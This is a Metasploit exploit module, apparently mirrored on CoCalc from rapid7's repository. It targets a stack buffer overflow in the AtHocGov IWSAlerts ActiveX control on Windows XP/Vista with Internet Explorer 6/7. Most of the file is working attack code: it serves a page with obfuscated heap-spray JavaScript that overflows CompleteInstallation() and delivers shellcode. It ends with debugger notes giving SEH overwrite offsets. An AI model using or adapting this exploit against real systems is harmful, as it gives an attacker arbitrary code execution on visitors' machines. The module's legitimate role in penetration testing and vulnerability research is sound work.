CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/athocgov_completeinstallation.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'AtHocGov IWSAlerts ActiveX Control Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When

16
        sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll

17
        (6.1.4.36) an attacker may be able to execute arbitrary code. This

18
        vulnerability was silently patched by the vendor.

19
      },

20
      'License'        => MSF_LICENSE,

21
      'Author'         => [ 'MC' ],

22
      'References'     =>

23
        [

24
          [ 'OSVDB', '94557' ]

25
        ],

26
      'DefaultOptions' =>

27
        {

28
          'EXITFUNC' => 'process',

29
        },

30
      'Payload'        =>

31
        {

32
          'Space'         => 1024,

33
          'BadChars'      => "\x00",

34
        },

35
      'Platform'       => 'win',

36
      'Targets'        =>

37
        [

38
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]

39
        ],

40
      'DisclosureDate' => '2008-02-15',

41
      'DefaultTarget'  => 0))

42


43
    register_options(

44
      [

45
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])

46
      ])

47
  end

48


49
  def autofilter

50
    false

51
  end

52


53
  def check_dependencies

54
    use_zlib

55
  end

56


57
  def on_request_uri(cli, request)

58
    # Re-generate the payload.

59
    return if ((p = regenerate_payload(cli)) == nil)

60


61
    # Encode the shellcode.

62
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

63


64
    ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)

65


66
    js = %Q|

67
      try {

68
        var evil_string = "";

69
        var index;

70
        var vulnerable = new ActiveXObject('AtHocGovGSTlBar.GSHelper.1');

71
        var my_unescape = unescape;

72
        var shellcode = '#{shellcode}';

73
        #{js_heap_spray}

74
        sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);

75
        for (index = 0; index < 12500; index++) {

76
          evil_string = evil_string + my_unescape('#{ret}');

77
        }

78
        vulnerable.CompleteInstallation(evil_string);

79
      } catch( e ) { window.location = 'about:blank' ; }

80
    |

81


82
    opts = {

83
      'Strings' => true,

84
      'Symbols' => {

85
        'Variables' => [

86
          'vulnerable',

87
          'shellcode',

88
          'my_unescape',

89
          'index',

90
          'evil_string',

91
        ]

92
      }

93
    }

94
    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)

95
    js.update_opts(js_heap_spray.opts)

96
    js.obfuscate(memory_sensitive: true)

97
    content = %Q|

98
      <html>

99
      <body>

100
        <script><!--

101
        #{js}

102
        //</script>

103
      </body>

104
      </html>

105
      |

106


107
    print_status("Sending #{self.name}")

108


109
    # Transmit the response to the client

110
    send_response_html(cli, content)

111


112
    # Handle the payload

113
    handler(cli)

114
  end

115


116
end

117
=begin

118
IDL info...

119
  [id(0x00000022)]

120
  HRESULT CompleteInstallation([in] BSTR strParam);

121


122
$~/trunk/./msfpescan -f AtHocGovTBr.dll

123
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 EXE [165]

124
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 DLL [159]

125


126
// smash /GS

127
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SecurityCookie

128
 SecurityCookie                 0x4278193c

129


130
// /SafeSEH, not today.

131
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SEH

132
 SEHandlerTable                 0x42774e40

133
 SEHandlerCount                 0x0000021b

134


135
0:000> !exchain

136
0013cae0: ntdll!_except_handler3+0 (7c90ee18)

137
  CRT scope  0, filter: ntdll!RtlFreeHeap+613 (7c93bec5)

138
                func:   ntdll!RtlFreeHeap+617 (7c93bece)

139
0013cb1c: AtHocGovTBr!SetOfflineInstall+a0b4 (4274f944)

140
0013dd9c: 61473161

141
Invalid exception stack at 47306147

142
0:000> !pattern_offset 5140 0x47306147

143
[Byakugan] Control of 0x47306147 at offset 4680.

144
0:000> !pattern_offset 5140 0x61473161

145
[Byakugan] Control of 0x61473161 at offset 4684.

146
=end

147


148